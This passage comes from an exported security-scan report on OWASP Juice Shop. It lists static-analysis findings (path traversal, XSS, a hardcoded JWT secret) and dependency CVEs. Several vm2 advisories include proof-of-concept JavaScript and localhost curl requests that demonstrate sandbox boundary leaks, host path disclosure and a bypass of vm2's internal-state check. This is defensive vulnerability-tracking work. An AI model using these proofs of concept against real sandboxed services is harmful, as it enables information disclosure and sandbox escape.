/src/routes/keyServer.ts
+
+
+
+ + + + + +
Description
+

Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 11: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
33
+ + + + + + + +
File Path
/src/routes/fileServer.ts
+
+
+
+ + + + + +
Description
+

Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 10: javascript.express.security.injection.raw-html-format.raw-html-format + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
197
+ + + + + + + +
File Path
/src/routes/chatbot.ts
+
+
+
+ + + + + +
Description
+

Result message: + User data flows into the host portion of this manually-constructed +HTML. This can introduce a Cross-Site-Scripting (XSS) vulnerability if +this comes from user-provided input. Consider using a sanitization +library such as DOMPurify to sanitize the HTML within.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 170: CVE-2016-4055 Moment 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
moment2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/moment/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

moment.js: regular expression denial of service
+Target: Node.js
+Type: node-pkg
+Fixed version: >=2.11.2

+

The duration function in the moment package before 2.11.2 for Node.js + allows remote attackers to cause a denial of service (CPU consumption) +via a long string, aka a "regular expression Denial of Service (ReDoS)."

+ + +
Mitigation
+
+

=2.11.2

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2016/04/20/11
+http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
+http://www.securityfocus.com/bid/95849
+https://access.redhat.com/security/cve/CVE-2016-4055
+https://github.com/advisories/GHSA-87vv-r9j6-g5qv
+https://github.com/moment/moment
+https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E
+https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E
+https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E
+https://nodesecurity.io/advisories/55
+https://nvd.nist.gov/vuln/detail/CVE-2016-4055
+https://ubuntu.com/security/notices/USN-4786-1
+https://www.cve.org/CVERecord?id=CVE-2016-4055
+https://www.npmjs.com/advisories/55
+https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS
+https://www.tenable.com/security/tns-2019-02

+ + + + + + + +
+
+
+
+ Finding 9: javascript.jsonwebtoken.security.jwt-hardcode.hardcoded-jwt-secret + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 798 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
56
+ + + + + + + +
File Path
/src/lib/insecurity.ts
+
+
+
+ + + + + +
Description
+

Result message: + A hard-coded credential was detected. It is not recommended to store +credentials in source-code, as this risks secrets being leaked and used +by either an internal or external malicious adversary. It is recommended + to use environment variables to securely provide credentials or +retrieve credentials from a secure vault or HSM (Hardware Security +Module).

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 8: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
40
+ + + + + + + +
File Path
/src/frontend/src/app/search-result/search-result.component.html
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 7: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
15
+ + + + + + + +
File Path
/src/frontend/src/app/purchase-basket/purchase-basket.component.html
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 6: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
17
+ + + + + + + +
File Path
/src/frontend/src/app/navbar/navbar.component.html
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 244: Secret Detected in +/juice-shop/frontend/src/app/last-login-ip/last-login- +ip.component.spec.ts - JWT Token + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
61
+ + + + + + + +
File Path
/juice-shop/frontend/src/app/last-login-ip/last-login-ip.component.spec.ts
+
+
+
+ + + + + +
Description
+

JWT token
+Category: JWT
+Match: ocalStorage.setItem('token', '*******************')

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 32: CVE-2026-0915 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 908 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

glibc: glibc: Information disclosure via zero-valued network query
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling getnetbyaddr or getnetbyaddr_r with a configured +nsswitch.conf that specifies the library's DNS backend for networks and +queries for a zero-valued network in the GNU C Library version 2.0 to +version 2.42 can leak stack contents to the configured DNS resolver.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/16/6
+https://access.redhat.com/errata/RHSA-2026:2786
+https://access.redhat.com/security/cve/CVE-2026-0915
+https://bugzilla.redhat.com/2429771
+https://bugzilla.redhat.com/2430201
+https://bugzilla.redhat.com/2431196
+https://bugzilla.redhat.com/show_bug.cgi?id=2429771
+https://bugzilla.redhat.com/show_bug.cgi?id=2430201
+https://bugzilla.redhat.com/show_bug.cgi?id=2431196
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915
+https://errata.almalinux.org/9/ALSA-2026-2786.html
+https://errata.rockylinux.org/RLSA-2026:2786
+https://linux.oracle.com/cve/CVE-2026-0915.html
+https://linux.oracle.com/errata/ELSA-2026-50174.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-0915
+https://sourceware.org/bugzilla/show_bug.cgi?id=33802
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2026-0915
+https://www.openwall.com/lists/oss-security/2026/01/16/6

+ + + + + + + +
+
+
+
+ Finding 31: CVE-2025-8058 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 415 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L

+ + +
Description
+

glibc: Double free in glibc
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 2.36-9+deb12u13

+

The regcomp function in the GNU C library version from 2.4 to 2.41 is
+subject to a double free if some previous allocation fails. It can be
+accomplished either by a malloc failure or by using an interposed malloc
+ that injects random malloc failures. The double free can allow buffer
+manipulation depending of how the regex is constructed. This issue
+affects all architectures and ABIs supported by the GNU C library.

+ + +
Mitigation
+

2.36-9+deb12u13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/07/23/1
+https://access.redhat.com/errata/RHSA-2025:12980
+https://access.redhat.com/security/cve/CVE-2025-8058
+https://bugzilla.redhat.com/2383146
+https://bugzilla.redhat.com/show_bug.cgi?id=2383146
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8058
+https://errata.almalinux.org/8/ALSA-2025-12980.html
+https://errata.rockylinux.org/RLSA-2025:12748
+https://linux.oracle.com/cve/CVE-2025-8058.html
+https://linux.oracle.com/errata/ELSA-2025-28054.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-8058
+https://sourceware.org/bugzilla/show_bug.cgi?id=33185
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2025-0005
+https://sourceware.org/git/?p=glibc.git;a=commit;h=3ff17af18c38727b88d9115e536c069e6b5d601f
+https://ubuntu.com/security/notices/USN-7760-1
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2025-8058

+ + + + + + + +
+
+
+
+ Finding 237: CVE-2026-44000 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

A sandbox boundary violation in vm2 allows host object identity to cross into the sandbox through host Promise resolution.

+

When a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox .then() callback preserves host identity. This allows the sandbox to interact with the host object directly, including:

+
    +
  • Performing identity checks using host-side WeakMap
  • +
  • Mutating host object state from inside the sandbox
  • +
+

This behavior occurs because the Promise fulfillment wrapper uses ensureThis() instead of the stronger cross-realm conversion path (from() / proxy wrapping). If no prototype mapping is found, ensureThis() returns the original object.

+

As a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.

+
+

Details

+

In setup-sandbox.js, vm2 wraps Promise.prototype.then:

+

```js
+globalPromise.prototype.then = function then(onFulfilled, onRejected) {
+ resetPromiseSpecies(this);

+

if (typeof onFulfilled === 'function') {
+ const origOnFulfilled = onFulfilled;
+ onFulfilled = function onFulfilled(value) {
+ value = ensureThis(value);
+ return apply(origOnFulfilled, this, [value]);
+ };
+ }

+

return apply(globalPromiseThen, this, [onFulfilled, onRejected]);
+};

+

The wrapper calls ensureThis(value) before invoking the sandbox callback.

+

However, ensureThis is implemented in bridge.js as thisEnsureThis():

+

function thisEnsureThis(other) {
+ const type = typeof other;

+

switch (type) {
+ case 'object':
+ if (other === null) return null;

+
case 'function':
+  let proto = thisReflectGetPrototypeOf(other);
+
+  if (!proto) {
+    return other;
+  }
+
+  while (proto) {
+    const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);
+
+    if (mapping) {
+      const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);
+      if (mapped) return mapped;
+      return mapping(defaultFactory, other);
+    }
+
+    proto = thisReflectGetPrototypeOf(proto);
+  }
+
+  return other;
+
+ +

If no prototype mapping is found, ensureThis() simply returns the original object:

+

return other;

+

This means the sandbox receives the original host object instead of a proxied or sanitized representation.

+

Because of this behavior, values resolved by host Promises can cross the host–sandbox boundary with identity preserved.

+

PoC

+

The following Proof of Concept demonstrates that an object resolved +by a host Promise can be used as a valid key in a host-side WeakMap from + inside the sandbox.

+

WeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.

+

PoC Code
+import {VM} from "./index.js";

+

const hostObj = {tag: "HOST_OBJ"};
+const hostPromise = Promise.resolve(hostObj);

+

// WeakMap created on the host
+const wm = new WeakMap([[hostObj, "HIT"]]);

+

const vm = new VM({
+ sandbox: {hostPromise, wm},
+ timeout: 1000,
+ eval: false,
+ wasm: false,
+});

+

const code = hostPromise.then(v => ({ + weakMapGet: wm.get(v), + typeofV: typeof v, + tag: v.tag + }));

+

const result = await vm.run(code);

+

console.log("VM RESULT:", result);
+console.log("HOST SAME KEY STILL:", wm.get(hostObj));
+Output
+VM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST_OBJ' }
+HOST SAME KEY STILL: HIT

+

This confirms that the object delivered to the sandbox callback retains host identity.

+

Additional Demonstration: Host Object Mutation

+

The sandbox can also mutate host object state through the resolved Promise value.

+

import {VM} from "./index.js";

+

const hostObj = {tag: "HOST_OBJ", nested: {x: 1}};
+const hostPromise = Promise.resolve(hostObj);

+

const vm = new VM({
+ sandbox: {hostPromise},
+ timeout: 1000,
+ eval: false,
+ wasm: false,
+});

+

const code = hostPromise.then(v => { + v.nested.x = 999; + v.tag = "MUTATED"; + return { seenTag: v.tag, seenX: v.nested.x }; + });

+

const result = await vm.run(code);

+

console.log("VM RESULT:", result);
+console.log("HOST AFTER:", hostObj);

+

Output:
+VM RESULT: { seenTag: 'MUTATED', seenX: 999 }
+HOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }

+

This demonstrates write-through mutation of a host object from sandbox code.

+

Impact
+This vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.

+

Consequences include:

+

Host object identity disclosure

+

Write-through mutation of host objects

+

WeakMap / WeakSet identity oracle across the boundary

+

Potential capability leaks if sensitive host objects are reachable via Promises

+

Applications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.

+

This weakens the intended isolation guarantees of vm2.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg

+ + + + + + + +
+
+
+
+ Finding 238: CVE-2026-44002 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

+ + +
Description
+

vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() + to return unsanitized host absolute paths. Any sandboxed code can +extract the full directory structure, library paths, and framework +versions of the host server.

+

Details

+

In lib/setup-sandbox.js:436-466, the CallSite class overrides getThis() and getFunction() with undefined + to prevent host object references from leaking into the sandbox. +However, the following methods pass through unsanitized values from the +original V8 CallSite object:

+
    +
  • getFileName() — returns host absolute paths like /app/node_modules/vm2/lib/vm.js
  • +
  • getLineNumber(), getColumnNumber() — exact source locations
  • +
  • getFunctionName(), getMethodName(), getTypeName() — internal function names
  • +
+

Two exploitation paths exist:
+1. Default error.stack: new Error().stack includes host frame paths in the formatted string
+2. Custom prepareStackTrace: Attacker can set Error.prepareStackTrace to directly call getFileName() on each CallSite, extracting a clean list of all host paths

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+const vm = new VM();
+
+// Path A — Default error.stack
+const result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);
+console.log(result1);
+// Output includes: /app/node_modules/vm2/lib/vm.js:289:18
+//                   /app/src/server.js:49:20
+
+// Path B — prepareStackTrace extraction
+const result2 = vm.run(`
+  Error.prepareStackTrace = function(e, sst) {
+    return sst.map(function(s) { return s.getFileName(); }).join(", ");
+  };
+  new Error().stack
+`);
+console.log(result2);
+// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...
+
+ +

HTTP demonstration:

+
# Default error.stack
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"try { null.x; } catch(e) { e.stack }"}'
+# Result includes host paths: /app/src/server.js, /app/node_modules/express/...
+
+# prepareStackTrace extraction
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\", \"); }; new Error().stack"}'
+# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...
+
+ +

Impact

+
    +
  • Information Disclosure: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.
  • +
  • Attack Chain: Leaked paths enable precise targeting for other vulnerabilities.
  • +
  • Scope: All applications using vm2. No special configuration required.
  • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw

+ + + + + + + +
+
+
+
+ Finding 181: CVE-2026-33672 Picomatch 2.3.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch2.3.1
+ + + + + + + +
File Path
juice-shop/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection +vulnerability affecting the POSIX_REGEX_SOURCE object. Because the object inherits from Object.prototype, specially crafted POSIX bracket expressions (e.g., [[:constructor:]]) + can reference inherited method names. These methods are implicitly +converted to strings and injected into the generated regular expression. + This leads to incorrect glob matching behavior (integrity impact), +where patterns may match unintended filenames. The issue does not enable + remote code execution, but it can cause security-relevant logic errors +in applications that rely on glob matching for filtering, validation, or + access control. All users of affected picomatch versions +that process untrusted or user-controlled glob patterns are potentially +impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users + should upgrade to one of these versions or later, depending on their +supported release line. If upgrading is not immediately possible, avoid +passing untrusted glob patterns to picomatch. Possible mitigations +include sanitizing or rejecting untrusted glob patterns, especially +those containing POSIX character classes like [[:...:]]; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying POSIX_REGEX_SOURCE to use a null prototype.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33672
+https://github.com/micromatch/picomatch
+https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903
+https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p
+https://nvd.nist.gov/vuln/detail/CVE-2026-33672
+https://www.cve.org/CVERecord?id=CVE-2026-33672

+ + + + + + + +
+
+
+
+ Finding 239: CVE-2026-44003 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

vm2's Transformer Fast-Path Bypass Exposes Internal State Variable
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

vm2's code transformer has a performance optimization that skips AST analysis when the code does not contain catch, import, or async keywords. This fast-path bypass allows sandboxed code to directly access the internal VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL variable, which exposes internal security functions (handleException, wrapWith, import).

+

Details

+

In lib/transformer.js:55-57, a regex check /\b(?:catch|import|async)\b/ + determines whether AST transformation is needed. If the code does not +contain any of these keywords, the transformer returns the code +unmodified.

+

When the fast-path is taken:
+1. INTERNAL_STATE_NAME identifier check is bypassed: The AST visitor that blocks access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL never runs
+2. with statement instrumentation is bypassed: with() statements are not wrapped with wrapWith(), enabling scope manipulation
+3. The internal state object exposes: handleException(e), wrapWith(x), import(what)

+

While these methods are currently defensive utilities (not direct +escape vectors), this represents a complete bypass of a security +control. Any future addition of a sensitive method to the internal state + object would be immediately exploitable.

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+const vm = new VM();
+
+// Access internal state (bypassed — no catch/import/async keywords)
+const result = vm.run(`
+  var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
+  Object.keys(x).join(",")
+`);
+console.log(result); // "wrapWith,handleException,import"
+
+// Control test — blocked when catch keyword is present
+try {
+  vm.run(`
+    try {
+      var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
+    } catch(e) { e.message }
+  `);
+} catch(e) {
+  console.log(e.message); // "Use of internal vm2 state variable"
+}
+
+ +

HTTP demonstration:

+
# Internal state access (bypassed)
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; Object.keys(x).join(\",\")"}'
+# Result: "wrapWith,handleException,import"
+
+# Control test — blocked when catch keyword is present
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"try { var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; } catch(e) { e.message }"}'
+# Result: {"errors":["Use of internal vm2 state variable"]}
+
+ +

Suggested fix:

+
// transformer.js:55 — add 'with' keyword and INTERNAL_STATE_NAME check
+if (!/\b(?:catch|import|async|with)\b/.test(code) && code.indexOf(INTERNAL_STATE_NAME) === -1) {
+    return {__proto__: null, code, hasAsync: false};
+}
+
+ +

Impact

+
    +
  • Security Control Bypass: The INTERNAL_STATE_NAME access restriction is completely ineffective when the code avoids 3 specific keywords.
  • +
  • Defense-in-Depth Violation: Internal security functions are exposed, creating a latent attack surface for future code changes.
  • +
  • Scope: All applications using vm2. No special configuration required.
  • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7

+ + + + + + + +
+
+
+
+ Finding 183: CVE-2026-33672 Picomatch 4.0.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch4.0.3
+ + + + + + + +
File Path
